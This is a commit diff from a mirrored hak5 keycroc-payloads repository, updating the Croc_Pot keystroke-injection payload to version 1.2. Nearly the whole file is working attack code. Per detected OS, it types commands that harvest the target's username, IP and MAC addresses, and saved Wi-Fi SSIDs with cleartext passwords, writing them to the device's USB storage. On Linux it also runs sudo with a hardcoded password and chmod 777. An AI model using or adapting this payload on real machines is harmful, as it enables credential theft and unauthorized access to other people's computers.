hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update Croc_Pot_Payload.txt

pull/23/head
spywill 2021-09-19 08:36:49 -04:00 committed by GitHub
parent c27799b620
commit 2d9753cca4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 305 additions and 221 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

526
library/Croc_Pot/Croc_Pot_Payload.txt
View File

@ -1,238 +1,322 @@
# Title: Croc_Pot Payload # Title: Croc_Pot Payload
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection # Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
# This will collect some data like (ip address, current user name, pc host name, ssid and passwd, mac address) # This will collect some data off target PC
# (ip address, current user name, pc host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder # save to tools/Croc_pot folder
# Author: Spywill # Author: Spywill
# Version: 1.1 # Version: 1.2
# Category: Key Croc # Category: Key Croc
#
#
MATCH crocpot MATCH crocpot
#
CROC_PW=hak5croc #<-----Edit KEYCROC_PASSWD_HERE #---> Edit KEYCROC_PASSWD_HERE
PC_PW=LINUX #<-----Edit LINUX-PC_PASSWD_HERE CROC_PW=hak5croc
#---> Edit LINUX-PC_PASSWD_HERE
PC_PW=LINUX
#---> Save keycroc passwd in temp folder
#---> This is used for starting Reverse SSH Tunnel with Target PC
echo "${CROC_PW}" >> /tmp/CPW.txt echo "${CROC_PW}" >> /tmp/CPW.txt
#
#---> Payload variable/remove existing OS detection
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
cat > ${CROC_OS} cat > ${CROC_OS}
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
#---> Enter ethernet mode for OS detection
ATTACKMODE AUTO_ETHERNET ATTACKMODE AUTO_ETHERNET
LED ATTACK LED ATTACK
#---> Keycroc built in functions to retrieve target PC Loot
GET TARGET_OS GET TARGET_OS
GET TARGET_IP GET TARGET_IP
GET HOST_IP GET HOST_IP
GET TARGET_HOSTNAME GET TARGET_HOSTNAME
#---> After OS detection case TARGET_OS value
case $TARGET_OS in case $TARGET_OS in
WINDOWS) WINDOWS)
LED R LED R
ATTACKMODE HID STORAGE #---> Enter Storage mode on keycroc
sleep 1 ATTACKMODE HID STORAGE
Q GUI r sleep 1
sleep 1 #---> Start windows powershell
Q STRING "powershell" Q GUI r
Q ENTER sleep 1
sleep 5 Q STRING "powershell"
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)" Q ENTER
Q ENTER sleep 5
sleep 1 #---> Place keycroc usb drive into variable
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
Q ENTER Q ENTER
sleep 1 sleep 1
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
sleep 1 Q ENTER
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" sleep 1
Q ENTER #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 2 Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" Q ENTER
Q ENTER sleep 1
sleep 3 #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append" Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER Q ENTER
sleep 3 sleep 2
ATTACKMODE HID #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 1 Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q ENTER
Q ENTER sleep 3
sleep 2 #---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
Q STRING "${CROC_PW}" Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER Q ENTER
sleep 2 sleep 3
echo "$TARGET_OS" >> ${CROC_OS} #---> Return back to ATTACKMODE HID mode
echo "$TARGET_IP" >> ${CROC_OS} ATTACKMODE HID
echo "$TARGET_HOSTNAME" >> ${CROC_OS} sleep 1
echo "$HOST_IP" >> ${CROC_OS} #---> Start SSH session with target PC
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt) Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt) Q ENTER
Q STRING "/root/udisk/tools/Croc_Pot.sh" sleep 2
Q ENTER;; #---> Entering keycroc passwd
MACOS) Q STRING "${CROC_PW}"
ATTACKMODE HID Q ENTER
LED G sleep 2
sleep 1 #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
Q GUI-SPACE echo "$TARGET_OS" >> ${CROC_OS}
sleep 1 echo "$TARGET_IP" >> ${CROC_OS}
Q STRING "terminal" echo "$TARGET_HOSTNAME" >> ${CROC_OS}
Q ENTER echo "$HOST_IP" >> ${CROC_OS}
sleep 2 #---> Edit with sed to remove powershell output "r" endlines & remove first character
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" $(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt)
Q ENTER $(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt)
sleep 2 #---> Starting Croc_Pot
Q STRING "${CROC_PW}" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER Q ENTER ;;
sleep 1 MACOS)
echo "$TARGET_OS" >> ${CROC_OS} #---> Return back to ATTACKMODE HID mode
echo "$TARGET_IP" >> ${CROC_OS} ATTACKMODE HID
echo "$TARGET_HOSTNAME" >> ${CROC_OS} LED G
echo "$HOST_IP" >> ${CROC_OS} sleep 1
Q STRING "/root/udisk/tools/Croc_Pot.sh" #---> Start mac os terminal
Q ENTER;; Q GUI-SPACE
LINUX) sleep 1
ATTACKMODE HID STORAGE Q STRING "terminal"
LED B Q ENTER
sleep 3 sleep 2
case $TARGET_HOSTNAME in #---> Start SSH session with target PC
raspberrypi) Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q GUI d Q ENTER
sleep 1 sleep 2
Q STRING "terminal" #---> Entering keycroc passwd
Q ENTER Q STRING "${CROC_PW}"
Q ENTER Q ENTER
sleep 2 sleep 1
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
Q ENTER echo "$TARGET_OS" >> ${CROC_OS}
Q STRING "whoami | tee \${PC_USER}" echo "$TARGET_IP" >> ${CROC_OS}
Q ENTER echo "$TARGET_HOSTNAME" >> ${CROC_OS}
sleep 1 echo "$HOST_IP" >> ${CROC_OS}
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" #---> Starting Croc_Pot
Q ENTER Q STRING "/root/udisk/tools/Croc_Pot.sh"
sleep 1 Q ENTER ;;
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}" LINUX)
Q ENTER #---> Enter Storage mode on keycroc
sleep 1 ATTACKMODE HID STORAGE
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" LED B
Q ENTER sleep 3
sleep 2 #---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" case $TARGET_HOSTNAME in
Q ENTER raspberrypi)
sleep 2 #---> Start Raspberry pi 4 terminal -->gnome-terminal installed<--
ATTACKMODE HID Q GUI d
sleep 1 sleep 1
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "terminal"
Q ENTER Q ENTER
sleep 2 Q ENTER
Q STRING "${CROC_PW}" sleep 2
Q ENTER #---> Place keycroc usb drive into variable
echo "$TARGET_OS" | tee -a ${CROC_OS} Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
echo "$TARGET_IP" | tee -a ${CROC_OS} Q ENTER
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS} #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
echo "$HOST_IP" | tee -a ${CROC_OS} Q STRING "whoami | tee \${PC_USER}"
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q ENTER
Q ENTER;; sleep 1
parrot) #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ALT F2 Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
sleep 1 Q ENTER
Q STRING "mate-terminal" sleep 1
Q ENTER #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 1 Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/" Q ENTER
Q ENTER sleep 1
Q STRING "${PC_PW}" #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
sleep 1 Q ENTER
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0" sleep 2
Q ENTER #---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
sleep 1 Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/" Q ENTER
Q ENTER sleep 2
sleep 1 #---> Return back to ATTACKMODE HID mode
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" ATTACKMODE HID
Q ENTER sleep 1
Q STRING "whoami | tee \${PC_USER}" #---> Start SSH session with target PC
Q ENTER Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
sleep 1 Q ENTER
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" sleep 2
Q ENTER #---> Entering keycroc passwd
sleep 1 Q STRING "${CROC_PW}"
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}" Q ENTER
Q ENTER #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
sleep 1 echo "$TARGET_OS" | tee -a ${CROC_OS}
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" echo "$TARGET_IP" | tee -a ${CROC_OS}
Q ENTER echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
sleep 1 echo "$HOST_IP" | tee -a ${CROC_OS}
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" #---> Starting Croc_Pot
Q ENTER Q STRING "/root/udisk/tools/Croc_Pot.sh"
sleep 2 Q ENTER ;;
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" parrot)
Q ENTER #---> Start mate-terminal -->Parrot OS<--
sleep 1 Q ALT F2
ATTACKMODE HID sleep 1
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" Q STRING "mate-terminal"
Q ENTER Q ENTER
sleep 2 sleep 1
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" #---> Create keycroc directory
Q ENTER Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
sleep 1 Q ENTER
Q STRING "${CROC_PW}" #---> Entering Linux passwd
Q ENTER Q STRING "${PC_PW}"
echo "$TARGET_OS" | tee -a ${CROC_OS} Q ENTER
echo "$TARGET_IP" | tee -a ${CROC_OS} sleep 1
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS} #---> Mount keycroc usb drive to target pc
echo "$HOST_IP" | tee -a ${CROC_OS} Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q ENTER
Q ENTER;; sleep 1
*) #---> Make KeyCroc folder executable
Q ALT F2 Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
sleep 1 Q ENTER
Q STRING "xterm" sleep 1
Q ENTER #---> Place keycroc usb drive into variable
sleep 1 Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/" Q ENTER
Q ENTER #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "${PC_PW}" Q STRING "whoami | tee \${PC_USER}"
Q ENTER Q ENTER
sleep 1 sleep 1
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0" #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
sleep 1 Q ENTER
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/" sleep 1
Q ENTER #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
sleep 1 Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" Q ENTER
Q ENTER sleep 1
Q STRING "whoami | tee \${PC_USER}" #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q ENTER Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
sleep 1 Q ENTER
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" sleep 1
Q ENTER #---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
sleep 1 Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}" Q ENTER
Q ENTER sleep 2
sleep 1 #---> Unmount keycroc usb drive
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER Q ENTER
sleep 1 sleep 1
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" #---> Return back to ATTACKMODE HID mode
Q ENTER ATTACKMODE HID
sleep 2 #---> Remove keycroc directory off target pc
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER Q ENTER
sleep 1 sleep 2
ATTACKMODE HID #---> Start SSH session with target PC
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 2 sleep 1
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" #---> Entering keycroc passwd
Q ENTER Q STRING "${CROC_PW}"
sleep 1 Q ENTER
Q STRING "${CROC_PW}" #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
Q ENTER echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_OS" | tee -a ${CROC_OS} echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS} echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS} echo "$HOST_IP" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS} #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER;; Q ENTER ;;
esac *)
;; #---> Start linux distributions terminal xterm
esac #---> Unsure of which linux distribution this will work on
Q ALT F2
sleep 1
Q STRING "xterm"
Q ENTER
sleep 1
#---> Create keycroc directory
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/"
Q ENTER
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER
sleep 1
#---> Mount keycroc usb drive to target pc
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q ENTER
sleep 1
#---> Make KeyCroc folder executable
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER
sleep 1
#---> Retrieve Shark Jack IP if connected to local network as keycroc & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w3 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER
sleep 2
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 2
#---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER
sleep 1
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;;
esac
;;
esac